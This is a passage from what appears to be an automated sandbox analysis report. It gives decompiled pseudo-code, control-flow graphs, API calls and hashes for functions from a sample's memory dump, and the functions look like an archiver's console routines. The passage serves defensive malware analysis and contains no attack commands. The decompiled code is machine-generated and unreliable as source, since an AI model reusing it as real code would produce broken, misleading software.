                                                                                                    0x003c09f6
                                                                                                    0x003c09f8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c09fe
                                                                                                    0x003c0a03
                                                                                                    0x003c0a08
                                                                                                    0x003c0a10
                                                                                                    0x003c0a15
                                                                                                    0x003c0a16
                                                                                                    0x003c0a1b
                                                                                                    0x003c0a1b
                                                                                                    0x003c0a1e
                                                                                                    0x003c0a43
                                                                                                    0x003c0a47
                                                                                                    0x003c0a54
                                                                                                    0x003c0a5a
                                                                                                    0x003c0a5c
                                                                                                    0x003c0a5e
                                                                                                    0x003c0a6d
                                                                                                    0x003c0a77
                                                                                                    0x003c0a7f
                                                                                                    0x003c0a83
                                                                                                    0x003c0a8b
                                                                                                    0x003c0a8f
                                                                                                    0x003c0a94
                                                                                                    0x003c0a9f
                                                                                                    0x003c0aa5
                                                                                                    0x003c0aab
                                                                                                    0x003c0ab3
                                                                                                    0x003c0ab3
                                                                                                    0x003c0a20
                                                                                                    0x003c0a26
                                                                                                    0x003c0a26
                                                                                                    0x003c0a2b
                                                                                                    0x003c0a30
                                                                                                    0x003c0a38
                                                                                                    0x003c0a3d
                                                                                                    0x003c0a3e
                                                                                                    0x00000000
                                                                                                    0x003c0a3e
                                                                                                    0x003c0a22
                                                                                                    0x003c0a24
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c0a24
                                                                                                    0x003c0922
                                                                                                    0x00000000
                                                                                                    0x003c0922

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C06F5
                                                                                                      • Part of subcall function 003B13F5: __EH_prolog.LIBCMT ref: 003B13FA
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C073F
                                                                                                    • _fileno.MSVCRT ref: 003C0750
                                                                                                    • _isatty.MSVCRT ref: 003C0759
                                                                                                    • _fileno.MSVCRT ref: 003C076F
                                                                                                    • _isatty.MSVCRT ref: 003C0772
                                                                                                    • _fileno.MSVCRT ref: 003C0785
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C08CD
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C09CF
                                                                                                    • wcscmp.MSVCRT ref: 003C09DC
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C0A16
                                                                                                    • _isatty.MSVCRT ref: 003C0788
                                                                                                      • Part of subcall function 003D097C: __EH_prolog.LIBCMT ref: 003D0981
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C0A3E
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 003C0A4D
                                                                                                    • SetProcessAffinityMask.KERNEL32(00000000), ref: 003C0A54
                                                                                                    • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 003C0A5E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                                                                                    • String ID: : ERROR : $01yw$SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                                                                                                    • API String ID: 1826148334-1613897665
                                                                                                    • Opcode ID: 1ac44e92917822caa363160f6885f86fee270c5cf5217b803baa4589c06d898b
                                                                                                    • Instruction ID: 539bd32f2c088b3e65adb0559b76cc0a47d4bfd4528e0f187956b91361db75be
                                                                                                    • Opcode Fuzzy Hash: 1ac44e92917822caa363160f6885f86fee270c5cf5217b803baa4589c06d898b
                                                                                                    • Instruction Fuzzy Hash: 18C1C231900385EFDB16DFA8C889FD9BBF0AF18314F15845DE499AB2A2C774AD44CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E6E12 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 777 3e6e12-3e6e32 call 41f1b0 780 3e6e38-3e6e6c fputs call 3e7141 777->780 781 3e7085 777->781 785 3e6e6e-3e6e71 780->785 786 3e6ec8-3e6ecd 780->786 782 3e7087-3e7095 781->782 789 3e6e8b-3e6e8d 785->789 790 3e6e73-3e6e89 fputs call 3b1fa0 785->790 787 3e6ecf-3e6ed4 786->787 788 3e6ed6-3e6edf 786->788 791 3e6ee2-3e6f10 call 3e7141 call 3e7422 787->791 788->791 793 3e6e8f-3e6e94 789->793 794 3e6e96-3e6e9f 789->794 790->786 804 3e6f1e-3e6f2f call 3e7365 791->804 805 3e6f12-3e6f19 call 3e711f 791->805 797 3e6ea2-3e6ec7 call 3b2d8a call 3e73c6 call 3b1e40 793->797 794->797 797->786 804->782 812 3e6f35-3e6f3f 804->812 805->804 813 3e6f4d-3e6f5b 812->813 814 3e6f41-3e6f48 call 3e70bb 812->814 813->782 817 3e6f61-3e6f64 813->817 814->813 818 3e6fb6-3e6fc0 817->818 819 3e6f66-3e6f86 817->819 820 3e7076-3e707f 818->820 821 3e6fc6-3e6fe1 fputs 818->821 824 3e6f8c-3e6f96 call 3e7365 819->824 825 3e7098-3e709d 819->825 820->780 820->781 821->820 826 3e6fe7-3e6ffb 821->826 831 3e6f9b-3e6f9d 824->831 827 3e70b1-3e70b9 SysFreeString 825->827 829 3e6ffd-3e701f 826->829 830 3e7073 826->830 827->782 834 3e709f-3e70a1 829->834 835 3e7021-3e7045 829->835 830->820 831->825 832 3e6fa3-3e6fb4 SysFreeString 831->832 832->818 832->819 836 3e70ae 834->836 838 3e7047-3e7071 call 3e72a7 call 3b92c9 SysFreeString 835->838 839 3e70a3-3e70ab call 3b92c9 835->839 836->827 838->829 838->830 839->836
                                                                                                    C-Code - Quality: 59%
                                                                                                    			E003E6E12(struct _IO_FILE** __ecx, intOrPtr __edx) {
				void* __ebx;
				short _t102;
				signed int _t108;
				signed int _t109;
				char* _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t136;
				char* _t140;
				void* _t142;
				struct _IO_FILE** _t147;
				signed int _t159;
				void* _t199;
				void* _t200;
				void* _t204;
				signed int _t205;
				void* _t206;
				intOrPtr* _t207;
				void* _t208;
				intOrPtr* _t211;
				intOrPtr* _t212;
				short _t213;
				void* _t214;

				E0041F1B0(E00426188, _t214);
				 *(_t214 - 0x14) =  *(_t214 - 0x14) & 0x00000000;
				 *((intOrPtr*)(_t214 - 0x20)) = __edx;
				_t147 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)(_t214 + 8)) + 4)) <= 0) {
					L29:
					_t102 = 0;
					L30:
					 *[fs:0x0] =  *((intOrPtr*)(_t214 - 0xc));
					return _t102;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 + 8)))) +  *(_t214 - 0x14) * 4));
					_t204 = _t211 + 0x78;
					fputs("--\n",  *_t147); // executed
					_push(0);
					_push( *((intOrPtr*)(_t211 + 0x18)));
					E003E7141(_t147, "Path"); // executed
					_t108 =  *(_t204 + 0xc);
					if(_t108 >= 0) {
						if(_t108 !=  *(_t211 + 0x3c)) {
							__eflags = _t108;
							if(_t108 >= 0) {
								_t140 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 - 0x20)) + 8)) + _t108 * 4)) + 0x10));
							} else {
								_t140 = "#";
							}
							E003B2D8A(_t214 - 0x40, _t140);
							 *(_t214 - 4) =  *(_t214 - 4) & 0x00000000;
							_t142 = E003E73C6(_t147, _t214 - 0x40, 1);
							_t23 = _t214 - 4;
							 *_t23 =  *(_t214 - 4) | 0xffffffff;
							__eflags =  *_t23;
							E003B1E40(_t142,  *((intOrPtr*)(_t214 - 0x40)));
						} else {
							fputs("Warning: The archive is open with offset",  *_t147);
							E003B1FA0(_t147);
						}
					}
					_t109 =  *(_t211 + 0x3c);
					if(_t109 >= 0) {
						_t111 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 - 0x20)) + 8)) + _t109 * 4)) + 0x10));
					} else {
						_t111 = "#";
					}
					_push(0);
					_push(_t111);
					E003E7141(_t147, "Type"); // executed
					E003E7422(_t147, _t204);
					_t159 =  *(_t211 + 0xdc);
					_t115 =  *((intOrPtr*)(_t211 + 0xd8)) +  *((intOrPtr*)(_t211 + 0x50));
					asm("adc ecx, [esi+0x54]");
					if((_t115 | _t159) != 0) {
						_push(_t159);
						_push(_t115);
						_t200 = 0x24;
						E003E711F(_t147, _t200);
					}
					_t212 =  *_t211;
					_push(0);
					_push(0x2c);
					_t102 = E003E7365(_t147, _t147, _t212); // executed
					if(_t102 != 0) {
						goto L30;
					}
					_t116 =  *(_t204 + 0x10);
					_t205 =  *(_t204 + 0x14);
					if((_t116 | _t205) != 0) {
						_push(_t205);
						_push(_t116);
						_t199 = 0x57;
						E003E70BB(_t147, _t199);
					}
					_t102 =  *((intOrPtr*)( *_t212 + 0x2c))(_t212, _t214 - 0x24);
					_t206 = 0;
					if(_t102 != 0) {
						goto L30;
					} else {
						if( *((intOrPtr*)(_t214 - 0x24)) <= 0) {
							L21:
							_t207 =  *((intOrPtr*)(_t214 + 8));
							if( *(_t214 - 0x14) ==  *((intOrPtr*)(_t207 + 4)) - 1) {
								L28:
								 *(_t214 - 0x14) =  *(_t214 - 0x14) + 1;
								if( *(_t214 - 0x14) <  *((intOrPtr*)(_t207 + 4))) {
									continue;
								}
								goto L29;
							}
							fputs("----\n",  *_t147);
							_push(_t214 - 0x2c);
							_push(_t212);
							if( *((intOrPtr*)( *_t212 + 0x24))() != 0) {
								goto L28;
							}
							_t208 = 0;
							 *(_t214 - 0x18) =  *( *((intOrPtr*)( *_t207 + 4 +  *(_t214 - 0x14) * 4)) + 0x40);
							if( *((intOrPtr*)(_t214 - 0x2c)) <= 0) {
								L27:
								_t207 =  *((intOrPtr*)(_t214 + 8));
								goto L28;
							} else {
								goto L24;
							}
							while(1) {
								L24:
								 *(_t214 - 0x1c) =  *(_t214 - 0x1c) & 0x00000000;
								 *(_t214 - 4) = 2;
								_t128 =  *((intOrPtr*)( *_t212 + 0x28))(_t212, _t208, _t214 - 0x1c, _t214 - 0x28, _t214 - 0x10);
								if(_t128 != 0) {
									break;
								}
								 *((short*)(_t214 - 0x50)) = 0;
								 *((short*)(_t214 - 0x4e)) = 0;
								 *((intOrPtr*)(_t214 - 0x48)) = 0;
								 *(_t214 - 4) = 3;
								_t130 =  *((intOrPtr*)( *_t212 + 0x18))(_t212,  *(_t214 - 0x18),  *((intOrPtr*)(_t214 - 0x28)), _t214 - 0x50);
								_t235 = _t130;
								 *((intOrPtr*)(_t214 - 0x34)) = _t130;
								if(_t130 != 0) {
									E003B92C9(_t214 - 0x50);
									_t213 =  *((intOrPtr*)(_t214 - 0x34));
									L34:
									_push( *(_t214 - 0x1c));
									L35:
									__imp__#6();
									_t102 = _t213;
									goto L30;
								}
								E003E72A7(_t147, _t147,  *((intOrPtr*)(_t214 - 0x28)), _t235);
								E003B92C9(_t214 - 0x50);
								 *(_t214 - 4) =  *(_t214 - 4) | 0xffffffff;
								__imp__#6( *(_t214 - 0x1c),  *(_t214 - 0x1c), _t214 - 0x50);
								_t208 = _t208 + 1;
								if(_t208 <  *((intOrPtr*)(_t214 - 0x2c))) {
									continue;
								}
								goto L27;
							}
							_t213 = _t128;
							goto L34;
						} else {
							goto L18;
						}
						while(1) {
							L18:
							 *(_t214 - 0x18) =  *(_t214 - 0x18) & 0x00000000;
							 *(_t214 - 4) = 1;
							_t136 =  *((intOrPtr*)( *_t212 + 0x30))(_t212, _t206, _t214 - 0x18, _t214 - 0x30, _t214 - 0xe);
							if(_t136 != 0) {
								break;
							}
							_push( *(_t214 - 0x18));
							_push( *((intOrPtr*)(_t214 - 0x30)));
							_t136 = E003E7365(_t147, _t147, _t212); // executed
							if(_t136 != 0) {
								break;
							}
							 *(_t214 - 4) =  *(_t214 - 4) | 0xffffffff;
							__imp__#6( *(_t214 - 0x18));
							_t206 = _t206 + 1;
							if(_t206 <  *((intOrPtr*)(_t214 - 0x24))) {
								continue;
							}
							goto L21;
						}
						_push( *(_t214 - 0x18));
						_t213 = _t136;
						goto L35;
					}
				}
				goto L30;
			}




























                                                                                                    0x003e6e17
                                                                                                    0x003e6e22
                                                                                                    0x003e6e2d
                                                                                                    0x003e6e30
                                                                                                    0x003e6e32
                                                                                                    0x003e7085
                                                                                                    0x003e7085
                                                                                                    0x003e7087
                                                                                                    0x003e708d
                                                                                                    0x003e7095
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6e38
                                                                                                    0x003e6e38
                                                                                                    0x003e6e47
                                                                                                    0x003e6e4a
                                                                                                    0x003e6e4d
                                                                                                    0x003e6e5d
                                                                                                    0x003e6e5f
                                                                                                    0x003e6e62
                                                                                                    0x003e6e67
                                                                                                    0x003e6e6c
                                                                                                    0x003e6e71
                                                                                                    0x003e6e8b
                                                                                                    0x003e6e8d
                                                                                                    0x003e6e9f
                                                                                                    0x003e6e8f
                                                                                                    0x003e6e8f
                                                                                                    0x003e6e8f
                                                                                                    0x003e6ea6
                                                                                                    0x003e6eab
                                                                                                    0x003e6eb6
                                                                                                    0x003e6ebb
                                                                                                    0x003e6ebb
                                                                                                    0x003e6ebb
                                                                                                    0x003e6ec2
                                                                                                    0x003e6e73
                                                                                                    0x003e6e7a
                                                                                                    0x003e6e84
                                                                                                    0x003e6e84
                                                                                                    0x003e6e71
                                                                                                    0x003e6ec8
                                                                                                    0x003e6ecd
                                                                                                    0x003e6edf
                                                                                                    0x003e6ecf
                                                                                                    0x003e6ecf
                                                                                                    0x003e6ecf
                                                                                                    0x003e6ee2
                                                                                                    0x003e6ee4
                                                                                                    0x003e6eec
                                                                                                    0x003e6ef5
                                                                                                    0x003e6f00
                                                                                                    0x003e6f06
                                                                                                    0x003e6f09
                                                                                                    0x003e6f10
                                                                                                    0x003e6f12
                                                                                                    0x003e6f13
                                                                                                    0x003e6f18
                                                                                                    0x003e6f19
                                                                                                    0x003e6f19
                                                                                                    0x003e6f1e
                                                                                                    0x003e6f20
                                                                                                    0x003e6f22
                                                                                                    0x003e6f28
                                                                                                    0x003e6f2f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6f35
                                                                                                    0x003e6f38
                                                                                                    0x003e6f3f
                                                                                                    0x003e6f41
                                                                                                    0x003e6f42
                                                                                                    0x003e6f47
                                                                                                    0x003e6f48
                                                                                                    0x003e6f48
                                                                                                    0x003e6f54
                                                                                                    0x003e6f57
                                                                                                    0x003e6f5b
                                                                                                    0x00000000
                                                                                                    0x003e6f61
                                                                                                    0x003e6f64
                                                                                                    0x003e6fb6
                                                                                                    0x003e6fb6
                                                                                                    0x003e6fc0
                                                                                                    0x003e7076
                                                                                                    0x003e7076
                                                                                                    0x003e707f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e707f
                                                                                                    0x003e6fcd
                                                                                                    0x003e6fda
                                                                                                    0x003e6fdb
                                                                                                    0x003e6fe1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6fec
                                                                                                    0x003e6ff8
                                                                                                    0x003e6ffb
                                                                                                    0x003e7073
                                                                                                    0x003e7073
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6ffd
                                                                                                    0x003e6ffd
                                                                                                    0x003e6ffd
                                                                                                    0x003e7011
                                                                                                    0x003e7018
                                                                                                    0x003e701f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e7021
                                                                                                    0x003e7025
                                                                                                    0x003e7029
                                                                                                    0x003e7032
                                                                                                    0x003e703d
                                                                                                    0x003e7040
                                                                                                    0x003e7042
                                                                                                    0x003e7045
                                                                                                    0x003e70a6
                                                                                                    0x003e70ab
                                                                                                    0x003e70ae
                                                                                                    0x003e70ae
                                                                                                    0x003e70b1
                                                                                                    0x003e70b1
                                                                                                    0x003e70b7
                                                                                                    0x00000000
                                                                                                    0x003e70b7
                                                                                                    0x003e7053
                                                                                                    0x003e705b
                                                                                                    0x003e7060
                                                                                                    0x003e7067
                                                                                                    0x003e706d
                                                                                                    0x003e7071
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e7071
                                                                                                    0x003e709f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6f66
                                                                                                    0x003e6f66
                                                                                                    0x003e6f66
                                                                                                    0x003e6f7a
                                                                                                    0x003e6f81
                                                                                                    0x003e6f86
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6f8c
                                                                                                    0x003e6f93
                                                                                                    0x003e6f96
                                                                                                    0x003e6f9d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6fa6
                                                                                                    0x003e6faa
                                                                                                    0x003e6fb0
                                                                                                    0x003e6fb4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6fb4
                                                                                                    0x003e7098
                                                                                                    0x003e709b
                                                                                                    0x00000000
                                                                                                    0x003e709b
                                                                                                    0x003e6f5b
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E6E17
                                                                                                    • fputs.MSVCRT ref: 003E6E4D
                                                                                                      • Part of subcall function 003E7141: __EH_prolog.LIBCMT ref: 003E7146
                                                                                                      • Part of subcall function 003E7141: fputs.MSVCRT ref: 003E715B
                                                                                                      • Part of subcall function 003E7141: fputs.MSVCRT ref: 003E7164
                                                                                                    • fputs.MSVCRT ref: 003E6E7A
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                      • Part of subcall function 003B92C9: VariantClear.OLEAUT32(?), ref: 003B92EB
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 003E6FAA
                                                                                                    • fputs.MSVCRT ref: 003E6FCD
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 003E7067
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 003E70B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                                                                                    • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                                                                                    • API String ID: 2889736305-3797937567
                                                                                                    • Opcode ID: e3c8d3b732e73bdb4f10033fa25bed604f1336f1ef9f0847505fee3a0aa7154e
                                                                                                    • Instruction ID: 1bb299bf1f3b14dbdbe4c9c8c2046e3d6fd73503ed382cda89f5758333df832d
                                                                                                    • Opcode Fuzzy Hash: e3c8d3b732e73bdb4f10033fa25bed604f1336f1ef9f0847505fee3a0aa7154e
                                                                                                    • Instruction Fuzzy Hash: E6918D31A00265EFDB16DFA5D985EEEB7B5FF58350F204229E412AB2D1DB30AD05CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B9809 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 47libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 846 3b9809-3b983c GetModuleHandleA 848 3b9869-3b9880 GlobalMemoryStatus 846->848 849 3b983e-3b9846 GlobalMemoryStatusEx 846->849 851 3b9882 848->851 852 3b9885-3b9887 848->852 849->848 850 3b9848-3b9851 849->850 853 3b985f 850->853 854 3b9853 850->854 851->852 855 3b988b-3b988f 852->855 858 3b9862-3b9867 853->858 856 3b985a-3b985d 854->856 857 3b9855-3b9858 854->857 856->858 857->853 857->856 858->855
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B9809(intOrPtr* __ecx) {
				struct _MEMORYSTATUS _v36;
				signed int _v56;
				intOrPtr _v60;
				struct _MEMORYSTATUSEX _v100;
				_Unknown_base(*)()* _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				signed int _t27;
				intOrPtr* _t28;
				void* _t31;

				_t28 = __ecx;
				 *__ecx = 0x80000000;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				_v100.dwLength = 0x40;
				_t20 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t20 == 0) {
					L8:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t22 = _v36.dwTotalVirtual;
					if(_t22 >= _v36.dwTotalPhys) {
						_t22 = _v36.dwTotalPhys;
					}
					 *_t28 = _t22;
					 *(_t28 + 4) =  *(_t28 + 4) & 0x00000000;
				} else {
					GlobalMemoryStatusEx( &_v100); // executed
					if(_t20 == 0) {
						goto L8;
					} else {
						_t27 = _v56;
						_t24 = _v100.ullTotalPhys;
						_t31 = _t27 - _v100.ullAvailPhys;
						if(_t31 > 0 || _t31 >= 0 && _v60 >= _t24) {
							_t27 = _v100.ullAvailPhys;
						} else {
							_t24 = _v60;
						}
						 *_t28 = _t24;
						 *(_t28 + 4) = _t27;
					}
				}
				return 1;
			}













                                                                                                    0x003b9810
                                                                                                    0x003b981c
                                                                                                    0x003b9822
                                                                                                    0x003b9826
                                                                                                    0x003b9834
                                                                                                    0x003b983c
                                                                                                    0x003b9869
                                                                                                    0x003b986c
                                                                                                    0x003b9874
                                                                                                    0x003b987a
                                                                                                    0x003b9880
                                                                                                    0x003b9882
                                                                                                    0x003b9882
                                                                                                    0x003b9885
                                                                                                    0x003b9887
                                                                                                    0x003b983e
                                                                                                    0x003b9842
                                                                                                    0x003b9846
                                                                                                    0x00000000
                                                                                                    0x003b9848
                                                                                                    0x003b9848
                                                                                                    0x003b984b
                                                                                                    0x003b984e
                                                                                                    0x003b9851
                                                                                                    0x003b985f
                                                                                                    0x003b985a
                                                                                                    0x003b985a
                                                                                                    0x003b985a
                                                                                                    0x003b9862
                                                                                                    0x003b9864
                                                                                                    0x003b9864
                                                                                                    0x003b9846
                                                                                                    0x003b988f

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 003B982D
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003B9834
                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 003B9842
                                                                                                    • GlobalMemoryStatus.KERNEL32 ref: 003B9874
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                                                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll$Net
                                                                                                    • API String ID: 180289352-3380815682
                                                                                                    • Opcode ID: 5fad695d811d295a1c3d9f2e2ec57afed31dd0f2777e46eb3efb8879f518256d
                                                                                                    • Instruction ID: e3b94b3ed14c4d36ac5fb6ca67067be87a2a52422f99d5347c8855b877240dda
                                                                                                    • Opcode Fuzzy Hash: 5fad695d811d295a1c3d9f2e2ec57afed31dd0f2777e46eb3efb8879f518256d
                                                                                                    • Instruction Fuzzy Hash: 3A115B70A10209DBDB24DFA0D889BEDB7F9BF04705F50441EE646EBA80D778A884CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E5116 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 859 3e5116-3e5130 call 41f1b0 862 3e515b-3e516c call 3e480a 859->862 863 3e5132-3e5142 call 3eb5fa 859->863 869 3e53ab-3e53ae 862->869 870 3e5172-3e518a 862->870 863->862 868 3e5144-3e5158 863->868 868->862 873 3e53b0-3e53b8 869->873 874 3e53e1-3e53f9 869->874 871 3e518f-3e5191 870->871 872 3e518c 870->872 877 3e519c-3e51a4 871->877 878 3e5193-3e5196 871->878 872->871 879 3e53be-3e53c4 call 3e6e12 873->879 880 3e54a7 call 3e571f 873->880 875 3e53fb call 3b1f91 874->875 876 3e5400-3e5408 874->876 875->876 876->880 884 3e540e-3e544c fputs call 3b211a call 3b1fa0 call 3e7485 876->884 885 3e51ce-3e51d0 877->885 886 3e51a6-3e51af call 3b1fa0 877->886 878->877 883 3e526e-3e5279 call 3e54bd 878->883 888 3e53c9-3e53cb 879->888 894 3e54ac-3e54ba 880->894 905 3e527b-3e527e 883->905 906 3e5284-3e528c 883->906 884->894 941 3e544e-3e5454 884->941 889 3e51ff-3e5203 885->889 890 3e51d2-3e51da 885->890 886->885 910 3e51b1-3e51c9 call 3b210c call 3b1fa0 886->910 888->894 895 3e53d1-3e53dc call 3b1fa0 888->895 899 3e5254-3e525c 889->899 900 3e5205-3e520d 889->900 896 3e51dc-3e51e2 call 3e4ef1 890->896 897 3e51e7-3e51f8 890->897 895->880 896->897 897->889 899->883 911 3e525e-3e5269 call 3b1fa0 call 3b1f91 899->911 907 3e520f-3e5237 fputs call 3b1fa0 call 3b1fb3 call 3b1fa0 900->907 908 3e523c-3e524d 900->908 905->906 914 3e535f-3e5363 905->914 915 3e528e-3e5297 call 3b1fa0 906->915 916 3e52b6-3e52b8 906->916 907->908 908->899 910->885 911->883 923 3e5397-3e53a3 914->923 924 3e5365-3e5373 914->924 915->916 946 3e5299-3e52b1 call 3b210c call 3b1fa0 915->946 920 3e52ba-3e52c2 916->920 921 3e52e7-3e52eb 916->921 929 3e52cf-3e52e0 920->929 930 3e52c4-3e52ca call 3e4ef1 920->930 932 3e533c-3e5344 921->932 933 3e52ed-3e52f5 921->933 923->870 938 3e53a9 923->938 934 3e5375-3e5387 call 3e5001 924->934 935 3e5390 924->935 929->921 930->929 932->914 948 3e5346-3e5352 call 3b1fa0 932->948 943 3e52f7-3e531f fputs call 3b1fa0 call 3b1fb3 call 3b1fa0 933->943 944 3e5324-3e5335 933->944 934->935 960 3e5389-3e538b call 3b1f91 934->960 935->923 938->869 949 3e549c-3e54a2 call 3b1f91 941->949 950 3e5456-3e545c 941->950 943->944 944->932 946->916 948->914 963 3e5354-3e535a call 3b1f91 948->963 949->880 957 3e545e-3e546e fputs 950->957 958 3e5470-3e548b call 3c3b30 call 3b1fb3 call 3b1e40 950->958 964 3e5490-3e5497 call 3b1fa0 957->964 958->964 960->935 963->914 964->949
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E003E5116(void* __ecx) {
				void* __edi;
				struct _IO_FILE** _t108;
				void* _t109;
				void* _t124;
				signed int _t162;
				signed int _t164;
				void* _t165;
				struct _IO_FILE** _t166;
				struct _IO_FILE** _t167;
				intOrPtr _t214;
				void* _t219;
				intOrPtr _t222;
				void* _t223;
				intOrPtr* _t224;
				void* _t226;
				void* _t228;

				E0041F1B0(E00426028, _t228);
				_t226 = __ecx;
				_t162 = 0;
				_push(_t219);
				if( *((intOrPtr*)(__ecx + 0xb8)) != 0) {
					E003EB5FA(__ecx + 0x14, _t219, 1);
					if( *((intOrPtr*)(_t226 + 0xb8)) != 0) {
						 *((intOrPtr*)(_t226 + 0x24)) = 0;
						 *((intOrPtr*)(_t226 + 0x28)) = 0;
						 *((intOrPtr*)(_t226 + 0x30)) = 0;
